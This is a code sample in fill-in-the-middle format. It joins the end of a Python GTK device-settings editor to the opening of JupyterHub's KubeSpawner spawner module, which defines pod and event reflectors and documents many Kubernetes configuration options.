string = ScrollAction.DISPLAY_STRING[conf_val]
store.append([conf_val, string])
self._scroll_store = store
col = Gtk.TreeViewColumn(C_(
"prefs: devices table: column header",
# TRANSLATORS: Column's data is a dropdown for how the device's
# TRANSLATORS: scroll wheel or scroll-gesture events are to be
# TRANSLATORS: interpreted normally.
u"Scroll…",
))
col.set_min_width(100)
col.set_resizable(True)
col.set_expand(False)
self._devices_view.append_column(col)
cell = Gtk.CellRendererCombo()
cell.set_property("model", self._scroll_store)
cell.set_property("text-column", self._USAGE_STRING_COL)
cell.set_property("mode", Gtk.CellRendererMode.EDITABLE)
cell.set_property("editable", True)
cell.set_property("has-entry", False)
cell.set_property("ellipsize", Pango.EllipsizeMode.END)
cell.connect("changed", self._scroll_cell_changed_cb)
col.pack_start(cell, True)
col.set_cell_data_func(cell, self._device_scroll_datafunc)
# Pretty borders
view_scroll = Gtk.ScrolledWindow()
view_scroll.set_shadow_type(Gtk.ShadowType.ETCHED_IN)
pol = Gtk.PolicyType.AUTOMATIC
view_scroll.set_policy(pol, pol)
view_scroll.add(self._devices_view)
view_scroll.set_hexpand(True)
view_scroll.set_vexpand(True)
self.attach(view_scroll, 0, 0, 1, 1)
self._update_devices_store()
self._monitor.devices_updated += self._update_devices_store
## Display and sort funcs
def _device_name_datafunc(self, column, cell, model, iter_, *data):
device = model.get_value(iter_, 0)
cell.set_property("text", device.get_name())
def _device_axes_datafunc(self, column, cell, model, iter_, *data):
device = model.get_value(iter_, 0)
n_axes = device.get_n_axes()
cell.set_property("text", "%d" % (n_axes,))
def _device_type_datafunc(self, column, cell, model, iter_, *data):
device = model.get_value(iter_, 0)
source = device.get_source()
text = _DEVICE_TYPE_STRING.get(source, source.value_nick)
cell.set_property("text", text)
def _device_usage_datafunc(self, column, cell, model, iter_, *data):
device = model.get_value(iter_, 0)
settings = self._monitor.get_device_settings(device)
if not settings:
return
text = AllowedUsage.DISPLAY_STRING[settings.usage]
cell.set_property("text", text)
def _device_scroll_datafunc(self, column, cell, model, iter_, *data):
device = model.get_value(iter_, 0)
settings = self._monitor.get_device_settings(device)
if not settings:
return
text = ScrollAction.DISPLAY_STRING[settings.scroll]
cell.set_property("text", text)
## Updates
def _usage_cell_changed_cb(self, combo, device_path_str,
usage_iter, *etc):
config = self._usage_store.get_value(
usage_iter,
self._USAGE_CONFIG_COL,
)
device_iter = self._devices_store.get_iter(device_path_str)
device = self._devices_store.get_value(device_iter, 0)
settings = self._monitor.get_device_settings(device)
if not settings:
return
settings.usage = config
self._devices_view.columns_autosize()
def _scroll_cell_changed_cb(self, conf_combo, device_path_str,
conf_iter, *etc):
conf_store = self._scroll_store
conf_col = self._SCROLL_CONFIG_COL
conf_value = conf_store.get_value(conf_iter, conf_col)
device_store = self._devices_store
device_iter = device_store.get_iter(device_path_str)
device = device_store.get_value(device_iter, 0)
settings = self._monitor.get_device_settings(device)
if not settings:
return
settings.scroll = conf_value
self._devices_view.columns_autosize()
def _update_devices_store(self, *_ignored):
"""Repopulates the displayed list"""
updated_list = list(self._monitor.get_devices())
updated_list_map = dict(updated_list)
paths_for_removal = []
devices_retained = set()
for row in self._devices_store:
device, = row
if device not in updated_list_map:
paths_for_removal.append(row.path)
continue
devices_retained.add(device)
for device, config in updated_list:
if device in devices_retained:
continue
self._devices_store.append([device])
for unwanted_row_path in reversed(paths_for_removal):
unwanted_row_iter = self._devices_store.get_iter(unwanted_row_path)
self._devices_store.remove(unwanted_row_iter)
self._devices_view.queue_draw()
## Helper funcs
def _device_prefs_key(device):
"""Returns the subkey to use in the app prefs for a device"""
source = device.get_source()
name = device.get_name()
n_axes = device.get_n_axes()
return u"%s:%s:%d" % (name, source.value_nick, n_axes)
def device_is_eraser(device):
"""Tests whether a device appears to be an eraser"""
if device is None:
return False
if device.get_source() == Gdk.InputSource.ERASER:
return True
if re.search(r'\<eraser\>', device.get_name(), re.I):
return True
return False
## Testing
def _test():
"""Interactive UI testing for SettingsEditor and Monitor"""
logging.basicConfig(level=logging.DEBUG)
win = Gtk.Window()
win.set_title("gui.device.SettingsEditor")
win.set_default_size(500, 400)
win.connect("destroy", Gtk.main_quit)
monitor = Monitor(app=None)
editor = SettingsEditor(monitor)
win.add(editor)
win.show_all()
Gtk.main()
print(monitor._prefs)
if __name__ == '__main__':
_test()<|fim▁end|> | settings = Settings(dev_prefs)
self._device_settings[device] = settings
self.devices_updated()
assert settings is not None |
<|file_name|>spawner.py<|end_file_name|><|fim▁begin|>"""
JupyterHub Spawner to spawn user notebooks on a Kubernetes cluster.
This module exports `KubeSpawner` class, which is the actual spawner
implementation that should be used by JupyterHub.
"""
import asyncio
import os
import signal
import string
import sys
import warnings
from functools import partial
from functools import wraps
from urllib.parse import urlparse
import escapism
from jinja2 import BaseLoader
from jinja2 import Environment
from jupyterhub.spawner import Spawner
from jupyterhub.traitlets import Command
from jupyterhub.utils import exponential_backoff
from kubernetes_asyncio import client
from kubernetes_asyncio.client.rest import ApiException
from slugify import slugify
from tornado import gen
from traitlets import Bool
from traitlets import default
from traitlets import Dict
from traitlets import Integer
from traitlets import List
from traitlets import observe
from traitlets import Unicode
from traitlets import Union
from traitlets import validate
from .clients import load_config
from .clients import shared_client
from .objects import make_namespace
from .objects import make_owner_reference
from .objects import make_pod
from .objects import make_pvc
from .objects import make_secret
from .objects import make_service
from .reflector import ResourceReflector
from .traitlets import Callable
class PodReflector(ResourceReflector):
"""
PodReflector is merely a configured ResourceReflector. It exposes
the pods property, which is simply mapping to self.resources where the
ResourceReflector keeps an updated list of the resource defined by
the `kind` field and the `list_method_name` field.
"""
kind = "pods"
# The default component label can be over-ridden by specifying the component_label property
labels = {
'component': 'singleuser-server',
}
@property
def pods(self):
"""
A dictionary of pods for the namespace as returned by the Kubernetes
API. The dictionary keys are the pod ids and the values are
dictionaries of the actual pod resource values.
ref: https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.20/#pod-v1-core
"""
return self.resources
class EventReflector(ResourceReflector):
"""
EventsReflector is merely a configured ResourceReflector. It
exposes the events property, which is simply mapping to self.resources where
the ResourceReflector keeps an updated list of the resource
defined by the `kind` field and the `list_method_name` field.
"""
kind = "events"
@property
def events(self):
"""
Returns list of dictionaries representing the k8s
events within the namespace, sorted by the latest event.
ref: https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.20/#event-v1-core
"""
# NOTE:
# - self.resources is a dictionary with keys mapping unique ids of
# Kubernetes Event resources, updated by ResourceReflector.
# self.resources will builds up with incoming k8s events, but can also
# suddenly refreshes itself entirely. We should not assume a call to
# this dictionary's values will result in a consistently ordered list,
# so we sort it to get it somewhat more structured.
# - We either seem to get only event['lastTimestamp'] or
# event['eventTime'], both fields serve the same role but the former
# is a low resolution timestamp without and the other is a higher
# resolution timestamp.
return sorted(
self.resources.values(),
key=lambda event: event["lastTimestamp"] or event["eventTime"],
)
class MockObject(object):
pass
class KubeSpawner(Spawner):
"""
A JupyterHub spawner that spawn pods in a Kubernetes Cluster. Each server
spawned by a user will have its own KubeSpawner instance.
"""
reflectors = {
"pods": None,
"events": None,
}
# Characters as defined by safe for DNS
# Note: '-' is not in safe_chars, as it is being used as escape character
safe_chars = set(string.ascii_lowercase + string.digits)
@property
def pod_reflector(self):
"""
A convenience alias to the class variable reflectors['pods'].
"""
return self.__class__.reflectors['pods']
@property
def event_reflector(self):
"""
A convenience alias to the class variable reflectors['events'] if the
spawner instance has events_enabled.
"""
if self.events_enabled:
return self.__class__.reflectors['events']
def __init__(self, *args, **kwargs):
_mock = kwargs.pop('_mock', False)
super().__init__(*args, **kwargs)
if _mock:
# runs during test execution only
if 'user' not in kwargs:
user = MockObject()
user.name = 'mock_name'
user.id = 'mock_id'
user.url = 'mock_url'
self.user = user
if 'hub' not in kwargs:
hub = MockObject()
hub.public_host = 'mock_public_host'
hub.url = 'mock_url'
hub.base_url = 'mock_base_url'
hub.api_url = 'mock_api_url'
self.hub = hub
# We have to set the namespace (if user namespaces are enabled)
# before we start the reflectors, so this must run before
# watcher start in normal execution. We still want to get the
# namespace right for test, though, so we need self.user to have
# been set in order to do that.
# By now, all the traitlets have been set, so we can use them to
# compute other attributes
if self.enable_user_namespaces:
self.namespace = self._expand_user_properties(self.user_namespace_template)
self.log.info("Using user namespace: {}".format(self.namespace))
self.pod_name = self._expand_user_properties(self.pod_name_template)
self.dns_name = self.dns_name_template.format(
namespace=self.namespace, name=self.pod_name
)
self.secret_name = self._expand_user_properties(self.secret_name_template)
self.pvc_name = self._expand_user_properties(self.pvc_name_template)
if self.working_dir:
self.working_dir = self._expand_user_properties(self.working_dir)
if self.port == 0:
# Our default port is 8888
self.port = 8888
# The attribute needs to exist, even though it is unset to start with
self._start_future = None
load_config(host=self.k8s_api_host, ssl_ca_cert=self.k8s_api_ssl_ca_cert)
self.api = shared_client("CoreV1Api")
self._start_watching_pods()
if self.events_enabled:
self._start_watching_events()
def _await_pod_reflector(method):
"""Decorator to wait for pod reflector to load
Apply to methods which require the pod reflector
to have completed its first load of pods.
"""
@wraps(method)
async def async_method(self, *args, **kwargs):
if not self.pod_reflector.first_load_future.done():
await self.pod_reflector.first_load_future
return await method(self, *args, **kwargs)
return async_method
def _await_event_reflector(method):
"""Decorator to wait for event reflector to load
Apply to methods which require the event reflector
to have completed its first load of events.
"""
@wraps(method)
async def async_method(self, *args, **kwargs):
if (
self.events_enabled
and not self.event_reflector.first_load_future.done()
):
await self.event_reflector.first_load_future
return await method(self, *args, **kwargs)
return async_method
k8s_api_ssl_ca_cert = Unicode(
"",
config=True,
help="""
Location (absolute filepath) for CA certs of the k8s API server.
Typically this is unnecessary, CA certs are picked up by
config.load_incluster_config() or config.load_kube_config.
In rare non-standard cases, such as using custom intermediate CA
for your cluster, you may need to mount root CA's elsewhere in
your Pod/Container and point this variable to that filepath
""",
)
k8s_api_host = Unicode(
"",
config=True,
help="""
Full host name of the k8s API server ("https://hostname:port").
Typically this is unnecessary, the hostname is picked up by
config.load_incluster_config() or config.load_kube_config.
""",
)
k8s_api_threadpool_workers = Integer(
config=True,
help="""
DEPRECATED in KubeSpawner 3.0.0.
No longer has any effect, as there is no threadpool anymore.
""",
)
k8s_api_request_timeout = Integer(
3,
config=True,
help="""
API request timeout (in seconds) for all k8s API calls.
This is the total amount of time a request might take before the connection
is killed. This includes connection time and reading the response.
NOTE: This is currently only implemented for creation and deletion of pods,
and creation of PVCs.
""",
)
k8s_api_request_retry_timeout = Integer(
30,
config=True,
help="""
Total timeout, including retry timeout, for kubernetes API calls
When a k8s API request connection times out, we retry it while backing
off exponentially. This lets you configure the total amount of time
we will spend trying an API request - including retries - before
giving up.
""",
)
events_enabled = Bool(
True,
config=True,
help="""
Enable event-watching for progress-reports to the user spawn page.
Disable if these events are not desirable
or to save some performance cost.
""",
)
enable_user_namespaces = Bool(
False,
config=True,
help="""
Cause each user to be spawned into an individual namespace.
This comes with some caveats. The Hub must run with significantly
more privilege (must have ClusterRoles analogous to its usual Roles)
and can therefore do heinous things to the entire cluster.
It will also make the Reflectors aware of pods and events across
all namespaces. This will have performance implications, although
using labels to restrict resource selection helps somewhat.
If you use this, consider cleaning up the user namespace in your
post_stop_hook.
""",
)
user_namespace_template = Unicode(
"{hubnamespace}-{username}",
config=True,
help="""
Template to use to form the namespace of user's pods (only if
enable_user_namespaces is True).
`{username}`, `{userid}`, `{servername}`, `{hubnamespace}`,
`{unescaped_username}`, and `{unescaped_servername}` will be expanded if
found within strings of this configuration. The username and servername
come escaped to follow the [DNS label
standard](https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#dns-label-names).
""",
)
namespace = Unicode(
config=True,
help="""
Kubernetes namespace to spawn user pods in.
Assuming that you are not running with enable_user_namespaces
turned on, if running inside a kubernetes cluster with service
accounts enabled, defaults to the current namespace, and if not,
defaults to `default`.
If you are running with enable_user_namespaces, this parameter
is ignored in favor of the `user_namespace_template` template
resolved with the hub namespace and the user name, with the
caveat that if the hub namespace is `default` the user
namespace will have the prefix `user` rather than `default`.
""",
)
@default('namespace')
def _namespace_default(self):
"""
Set namespace default to current namespace if running in a k8s cluster
If not in a k8s cluster with service accounts enabled, default to
`default`
"""
ns_path = '/var/run/secrets/kubernetes.io/serviceaccount/namespace'
if os.path.exists(ns_path):
with open(ns_path) as f:
return f.read().strip()
return 'default'
ip = Unicode(
'0.0.0.0',
config=True,
help="""
The IP address (or hostname) the single-user server should listen on.
We override this from the parent so we can set a more sane default for
the Kubernetes setup.
""",
)
cmd = Command(
None,
allow_none=True,
minlen=0,
config=True,
help="""
The command used to start the single-user server.
Either
- a string containing a single command or path to a startup script
- a list of the command and arguments
- `None` (default) to use the Docker image's `CMD`
If `cmd` is set, it will be augmented with `spawner.get_args(). This will override the `CMD` specified in the Docker image.
""",
)
# FIXME: Don't override 'default_value' ("") or 'allow_none' (False) (Breaking change)
working_dir = Unicode(
None,
allow_none=True,
config=True,
help="""
The working directory where the Notebook server will be started inside the container.
Defaults to `None` so the working directory will be the one defined in the Dockerfile.
`{username}`, `{userid}`, `{servername}`, `{hubnamespace}`,
`{unescaped_username}`, and `{unescaped_servername}` will be expanded if
found within strings of this configuration. The username and servername
come escaped to follow the [DNS label
standard](https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#dns-label-names).
""",
)
# FIXME: Don't override 'default_value' ("") or 'allow_none' (False) (Breaking change)
service_account = Unicode(
None,
allow_none=True,
config=True,
help="""
The service account to be mounted in the spawned user pod.
The token of the service account is NOT mounted by default.
This makes sure that we don't accidentally give access to the whole
kubernetes API to the users in the spawned pods.
Set automount_service_account_token True to mount it.
This `serviceaccount` must already exist in the namespace the user pod is being spawned in.
""",
)
automount_service_account_token = Bool(
None,
allow_none=True,
config=True,
help="""
Whether to mount the service account token in the spawned user pod.
The default value is None, which mounts the token if the service account is explicitly set,
but doesn't mount it if not.
WARNING: Be careful with this configuration! Make sure the service account being mounted
has the minimal permissions needed, and nothing more. When misconfigured, this can easily
give arbitrary users root over your entire cluster.
""",
)
dns_name_template = Unicode(
"{name}.{namespace}.svc.cluster.local",
config=True,
help="""
Template to use to form the dns name for the pod.
""",
)
pod_name_template = Unicode(
'jupyter-{username}--{servername}',
config=True,
help="""
Template to use to form the name of user's pods.
`{username}`, `{userid}`, `{servername}`, `{hubnamespace}`,
`{unescaped_username}`, and `{unescaped_servername}` will be expanded if
found within strings of this configuration. The username and servername
come escaped to follow the [DNS label
standard](https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#dns-label-names).
Trailing `-` characters are stripped for safe handling of empty server names (user default servers).
This must be unique within the namespace the pods are being spawned
in, so if you are running multiple jupyterhubs spawning in the
same namespace, consider setting this to be something more unique.
.. versionchanged:: 0.12
`--` delimiter added to the template,
where it was implicitly added to the `servername` field before.
Additionally, `username--servername` delimiter was `-` instead of `--`,
allowing collisions in certain circumstances.
""",
)
pod_connect_ip = Unicode(
config=True,
help="""
The IP address (or hostname) of user's pods which KubeSpawner connects to.
If you do not specify the value, KubeSpawner will use the pod IP.
e.g. 'jupyter-{username}--{servername}.notebooks.jupyterhub.svc.cluster.local',
`{username}`, `{userid}`, `{servername}`, `{hubnamespace}`,
`{unescaped_username}`, and `{unescaped_servername}` will be expanded if
found within strings of this configuration. The username and servername
come escaped to follow the [DNS label
standard](https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#dns-label-names).
Trailing `-` characters in each domain level are stripped for safe handling of empty server names (user default servers).
This must be unique within the namespace the pods are being spawned
in, so if you are running multiple jupyterhubs spawning in the
same namespace, consider setting this to be something more unique.
""",
)
storage_pvc_ensure = Bool(
False,
config=True,
help="""
Ensure that a PVC exists for each user before spawning.
Set to true to create a PVC named with `pvc_name_template` if it does
not exist for the user when their pod is spawning.
""",
)
delete_pvc = Bool(
True,
config=True,
help="""Delete PVCs when deleting Spawners.
When a Spawner is deleted (not just stopped),
delete its associated PVC.
This occurs when a named server is deleted,
or when the user itself is deleted for the default Spawner.
Requires JupyterHub 1.4.1 for Spawner.delete_forever support.
.. versionadded: 0.17
""",
)
pvc_name_template = Unicode(
'claim-{username}--{servername}',
config=True,
help="""
Template to use to form the name of user's pvc.
`{username}`, `{userid}`, `{servername}`, `{hubnamespace}`,
`{unescaped_username}`, and `{unescaped_servername}` will be expanded if
found within strings of this configuration. The username and servername
come escaped to follow the [DNS label
standard](https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#dns-label-names).
Trailing `-` characters are stripped for safe handling of empty server names (user default servers).
This must be unique within the namespace the pvc are being spawned
in, so if you are running multiple jupyterhubs spawning in the
same namespace, consider setting this to be something more unique.
.. versionchanged:: 0.12
`--` delimiter added to the template,
where it was implicitly added to the `servername` field before.
Additionally, `username--servername` delimiter was `-` instead of `--`,
allowing collisions in certain circumstances.
""",
)
component_label = Unicode(
'singleuser-server',
config=True,
help="""
The component label used to tag the user pods. This can be used to override
the spawner behavior when dealing with multiple hub instances in the same
namespace. Usually helpful for CI workflows.
""",
)
secret_name_template = Unicode(
'jupyter-{username}{servername}',
config=True,
help="""
Template to use to form the name of user's secret.
`{username}`, `{userid}`, `{servername}`, `{hubnamespace}`,
`{unescaped_username}`, and `{unescaped_servername}` will be expanded if
found within strings of this configuration. The username and servername
come escaped to follow the [DNS label
standard](https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#dns-label-names).
This must be unique within the namespace the pvc are being spawned
in, so if you are running multiple jupyterhubs spawning in the
same namespace, consider setting this to be something more unique.
""",
)
secret_mount_path = Unicode(
"/etc/jupyterhub/ssl/",
allow_none=False,
config=True,
help="""
Location to mount the spawned pod's certificates needed for internal_ssl functionality.
""",
)
# FIXME: Don't override 'default_value' ("") or 'allow_none' (False) (Breaking change)
hub_connect_ip = Unicode(
allow_none=True,
config=True,
help="""DEPRECATED. Use c.JupyterHub.hub_connect_ip""",
)
hub_connect_port = Integer(
config=True, help="""DEPRECATED. Use c.JupyterHub.hub_connect_url"""
)
@observe('hub_connect_ip', 'hub_connect_port')
def _deprecated_changed(self, change):
warnings.warn(
"""
KubeSpawner.{0} is deprecated with JupyterHub >= 0.8.
Use JupyterHub.{0}
""".format(
change.name
),
DeprecationWarning,
)
setattr(self.hub, change.name.split('_', 1)[1], change.new)
common_labels = Dict(
{
'app': 'jupyterhub',
'heritage': 'jupyterhub',
},
config=True,
help="""
Kubernetes labels that both spawned singleuser server pods and created
user PVCs will get.
Note that these are only set when the Pods and PVCs are created, not
later when this setting is updated.
""",
)
extra_labels = Dict(
config=True,
help="""
Extra kubernetes labels to set on the spawned single-user pods, as well
as on the pods' associated k8s Service and k8s Secret if internal_ssl is
enabled.
The keys and values specified here would be set as labels on the spawned single-user
kubernetes pods. The keys and values must both be strings that match the kubernetes
label key / value constraints.
See `the Kubernetes documentation <https://kubernetes.io/docs/concepts/overview/working-with-objects/labels/>`__
for more info on what labels are and why you might want to use them!
`{username}`, `{userid}`, `{servername}`, `{hubnamespace}`,
`{unescaped_username}`, and `{unescaped_servername}` will be expanded if
found within strings of this configuration. The username and servername
come escaped to follow the [DNS label
standard](https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#dns-label-names).
""",
)
extra_annotations = Dict(
config=True,
help="""
Extra Kubernetes annotations to set on the spawned single-user pods, as
well as on the pods' associated k8s Service and k8s Secret if
internal_ssl is enabled.
The keys and values specified here are added as annotations on the spawned single-user
kubernetes pods. The keys and values must both be strings.
See `the Kubernetes documentation <https://kubernetes.io/docs/concepts/overview/working-with-objects/annotations/>`__
for more info on what annotations are and why you might want to use them!
`{username}`, `{userid}`, `{servername}`, `{hubnamespace}`,
`{unescaped_username}`, and `{unescaped_servername}` will be expanded if
found within strings of this configuration. The username and servername
come escaped to follow the [DNS label
standard](https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#dns-label-names).
""",
)
image = Unicode(
'jupyterhub/singleuser:latest',
config=True,
help="""
Docker image to use for spawning user's containers.
Defaults to `jupyterhub/singleuser:latest`
Name of the container + a tag, same as would be used with
a `docker pull` command. If tag is set to `latest`, kubernetes will
check the registry each time a new user is spawned to see if there
is a newer image available. If available, new image will be pulled.
Note that this could cause long delays when spawning, especially
if the image is large. If you do not specify a tag, whatever version
of the image is first pulled on the node will be used, thus possibly
leading to inconsistent images on different nodes. For all these
reasons, it is recommended to specify a specific immutable tag
for the image.
If your image is very large, you might need to increase the timeout
for starting the single user container from the default. You can
set this with::
c.KubeSpawner.start_timeout = 60 * 5 # Up to 5 minutes
""",
)
image_pull_policy = Unicode(
'IfNotPresent',
config=True,
help="""
The image pull policy of the docker container specified in
`image`.
Defaults to `IfNotPresent` which causes the Kubelet to NOT pull the image
specified in KubeSpawner.image if it already exists, except if the tag
is `:latest`. For more information on image pull policy,
refer to `the Kubernetes documentation <https://kubernetes.io/docs/concepts/containers/images/>`__.
This configuration is primarily used in development if you are
actively changing the `image_spec` and would like to pull the image
whenever a user container is spawned.
""",
)
image_pull_secrets = Union(
trait_types=[
List(),
Unicode(),
],
config=True,
help="""
A list of references to Kubernetes Secret resources with credentials to
pull images from image registries. This list can either have strings in
it or objects with the string value nested under a name field.
Passing a single string is still supported, but deprecated as of
KubeSpawner 0.14.0.
See `the Kubernetes documentation
<https://kubernetes.io/docs/concepts/containers/images/#specifying-imagepullsecrets-on-a-pod>`__
for more information on when and why this might need to be set, and what
it should be set to.
""",
)
@validate('image_pull_secrets')
def _validate_image_pull_secrets(self, proposal):
if type(proposal['value']) == str:
warnings.warn(
"""Passing KubeSpawner.image_pull_secrets string values is
deprecated since KubeSpawner 0.14.0. The recommended
configuration is now a list of either strings or dictionary
objects with the string referencing the Kubernetes Secret name
in under the value of the dictionary's name key.""",
DeprecationWarning,
)
return [{"name": proposal['value']}]
return proposal['value']
node_selector = Dict(
config=True,
help="""
The dictionary Selector labels used to match the Nodes where Pods will be launched.
Default is None and means it will be launched in any available Node.
For example to match the Nodes that have a label of `disktype: ssd` use::
c.KubeSpawner.node_selector = {'disktype': 'ssd'}
""",
)
uid = Union(
trait_types=[
Integer(),
Callable(),
],
default_value=None,
allow_none=True,
config=True,
help="""
The UID to run the single-user server containers as.
This UID should ideally map to a user that already exists in the container
image being used. Running as root is discouraged.
Instead of an integer, this could also be a callable that takes as one
parameter the current spawner instance and returns an integer. The callable
will be called asynchronously if it returns a future. Note that
the interface of the spawner class is not deemed stable across versions,
so using this functionality might cause your JupyterHub or kubespawner
upgrades to break.
If set to `None`, the user specified with the `USER` directive in the
container metadata is used.
""",
)
gid = Union(
trait_types=[
Integer(),
Callable(),
],
default_value=None,
allow_none=True,
config=True,
help="""
The GID to run the single-user server containers as.
This GID should ideally map to a group that already exists in the container
image being used. Running as root is discouraged.
Instead of an integer, this could also be a callable that takes as one
parameter the current spawner instance and returns an integer. The callable
will be called asynchronously if it returns a future. Note that
the interface of the spawner class is not deemed stable across versions,
so using this functionality might cause your JupyterHub or kubespawner
upgrades to break.
If set to `None`, the group of the user specified with the `USER` directive
in the container metadata is used.
""",
)
fs_gid = Union(
trait_types=[
Integer(),
Callable(),
],
default_value=None,
allow_none=True,
config=True,
help="""
The GID of the group that should own any volumes that are created & mounted.
A special supplemental group that applies primarily to the volumes mounted
in the single-user server. In volumes from supported providers, the following
things happen:
1. The owning GID will be the this GID
2. The setgid bit is set (new files created in the volume will be owned by
this GID)
3. The permission bits are OR’d with rw-rw
The single-user server will also be run with this gid as part of its supplemental
groups.
Instead of an integer, this could also be a callable that takes as one
parameter the current spawner instance and returns an integer. The callable will
be called asynchronously if it returns a future, rather than an int. Note that
the interface of the spawner class is not deemed stable across versions,
so using this functionality might cause your JupyterHub or kubespawner
upgrades to break.
You'll *have* to set this if you are using auto-provisioned volumes with most
cloud providers. See `fsGroup <https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.20/#podsecuritycontext-v1-core>`__
for more details.
""",
)
supplemental_gids = Union(
trait_types=[
List(),
Callable(),
],
config=True,
help="""
A list of GIDs that should be set as additional supplemental groups to the
user that the container runs as.
Instead of a list of integers, this could also be a callable that takes as one
parameter the current spawner instance and returns a list of integers. The
callable will be called asynchronously if it returns a future, rather than
a list. Note that the interface of the spawner class is not deemed stable
across versions, so using this functionality might cause your JupyterHub
or kubespawner upgrades to break.
You may have to set this if you are deploying to an environment with RBAC/SCC
enforced and pods run with a 'restricted' SCC which results in the image being
run as an assigned user ID. The supplemental group IDs would need to include
the corresponding group ID of the user ID the image normally would run as. The
image must setup all directories/files any application needs access to, as group
writable.
""",
)
privileged = Bool(
False,
config=True,
help="""
Whether to run the pod with a privileged security context.
""",
)
allow_privilege_escalation = Bool(
False,
allow_none=True,
config=True,
help="""
Controls whether a process can gain more privileges than its parent process.
When set to False (the default), the primary user visible effect is that
setuid binaries (like sudo) will no longer work.
When set to None, the defaults for the cluster are respected.
This bool directly controls whether the no_new_privs flag gets set on the container
AllowPrivilegeEscalation is true always when the container is:
1) run as Privileged OR 2) has CAP_SYS_ADMIN.
""",
)
container_security_context = Union(
trait_types=[
Dict(),
Callable(),
],
config=True,
help="""
A Kubernetes security context for the container. Note that all
configuration options within here should be camelCased.
What is configured here has the highest priority, so the alternative
configuration `uid`, `gid`, `privileged`, and
`allow_privilege_escalation` will be overridden by this.
Rely on `the Kubernetes reference
<https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.20/#securitycontext-v1-core>`__
for details on allowed configuration.
""",
)
pod_security_context = Union(
trait_types=[
Dict(),
Callable(),
],
config=True,
help="""
A Kubernetes security context for the pod. Note that all configuration
options within here should be camelCased.
What is configured here has higher priority than `fs_gid` and
`supplemental_gids`, but lower priority than what is set in the
`container_security_context`.
Note that anything configured on the Pod level will influence all
containers, including init containers and sidecar containers.
Rely on `the Kubernetes reference
<https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.20/#podsecuritycontext-v1-core>`__
for details on allowed configuration.
""",
)
modify_pod_hook = Callable(
None,
allow_none=True,
config=True,
help="""
Callable to augment the Pod object before launching.
Expects a callable that takes two parameters:
1. The spawner object that is doing the spawning
2. The Pod object that is to be launched
You should modify the Pod object and return it.
This can be a coroutine if necessary. When set to none, no augmenting is done.
This is very useful if you want to modify the pod being launched dynamically.
Note that the spawner object can change between versions of KubeSpawner and JupyterHub,
so be careful relying on this!
""",
)
volumes = List(
config=True,
help="""
List of Kubernetes Volume specifications that will be mounted in the user pod.
This list will be directly added under `volumes` in the kubernetes pod spec,
so you should use the same structure. Each item in the list must have the
following two keys:
- `name`
Name that'll be later used in the `volume_mounts` config to mount this
volume at a specific path.
- `<name-of-a-supported-volume-type>` (such as `hostPath`, `persistentVolumeClaim`,
etc)
The key name determines the type of volume to mount, and the value should
be an object specifying the various options available for that kind of
volume.
See `the Kubernetes documentation <https://kubernetes.io/docs/concepts/storage/volumes>`__
for more information on the various kinds of volumes available and their options.
Your kubernetes cluster must already be configured to support the volume types you want to use.
`{username}`, `{userid}`, `{servername}`, `{hubnamespace}`,
`{unescaped_username}`, and `{unescaped_servername}` will be expanded if
found within strings of this configuration. The username and servername
come escaped to follow the [DNS label
standard](https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#dns-label-names).
""",
)
volume_mounts = List(
config=True,
help="""
List of paths on which to mount volumes in the user notebook's pod.
This list will be added to the values of the `volumeMounts` key under the user's
container in the kubernetes pod spec, so you should use the same structure as that.
Each item in the list should be a dictionary with at least these two keys:
- `mountPath` The path on the container in which we want to mount the volume.
- `name` The name of the volume we want to mount, as specified in the `volumes` config.
See `the Kubernetes documentation <https://kubernetes.io/docs/concepts/storage/volumes>`__
for more information on how the `volumeMount` item works.
`{username}`, `{userid}`, `{servername}`, `{hubnamespace}`,
`{unescaped_username}`, and `{unescaped_servername}` will be expanded if
found within strings of this configuration. The username and servername
come escaped to follow the [DNS label
standard](https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#dns-label-names).
""",
)
# FIXME: Don't override 'default_value' ("") or 'allow_none' (False) (Breaking change)
storage_capacity = Unicode(
None,
config=True,
allow_none=True,
help="""
The amount of storage space to request from the volume that the pvc will
mount to. This amount will be the amount of storage space the user has
to work with on their notebook. If left blank, the kubespawner will not
create a pvc for the pod.
This will be added to the `resources: requests: storage:` in the k8s pod spec.
See `the Kubernetes documentation <https://kubernetes.io/docs/concepts/storage/persistent-volumes/#persistentvolumeclaims>`__
for more information on how storage works.
Quantities can be represented externally as unadorned integers, or as fixed-point
integers with one of these SI suffices (`E, P, T, G, M, K, m`) or their power-of-two
equivalents (`Ei, Pi, Ti, Gi, Mi, Ki`). For example, the following represent roughly
the same value: `128974848`, `129e6`, `129M`, `123Mi`.
""",
)
storage_extra_labels = Dict(
config=True,
help="""
Extra kubernetes labels to set on the user PVCs.
The keys and values specified here would be set as labels on the PVCs
created by kubespawner for the user. Note that these are only set
when the PVC is created, not later when this setting is updated.
See `the Kubernetes documentation <https://kubernetes.io/docs/concepts/overview/working-with-objects/labels/>`__
for more info on what labels are and why you might want to use them!
`{username}`, `{userid}`, `{servername}`, `{hubnamespace}`,
`{unescaped_username}`, and `{unescaped_servername}` will be expanded if
found within strings of this configuration. The username and servername
come escaped to follow the [DNS label
standard](https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#dns-label-names).
""",
)
# FIXME: Don't override 'default_value' ("") or 'allow_none' (False) (Breaking change)
storage_class = Unicode(
None,
config=True,
allow_none=True,
help="""
The storage class that the pvc will use.
This will be added to the `annotations: volume.beta.kubernetes.io/storage-class:`
in the pvc metadata.
This will determine what type of volume the pvc will request to use. If one exists
that matches the criteria of the StorageClass, the pvc will mount to that. Otherwise,
b/c it has a storage class, k8s will dynamically spawn a pv for the pvc to bind to
and a machine in the cluster for the pv to bind to.
Note that an empty string is a valid value and is always interpreted to be
requesting a pv with no class.
See `the Kubernetes documentation <https://kubernetes.io/docs/concepts/storage/storage-classes/>`__
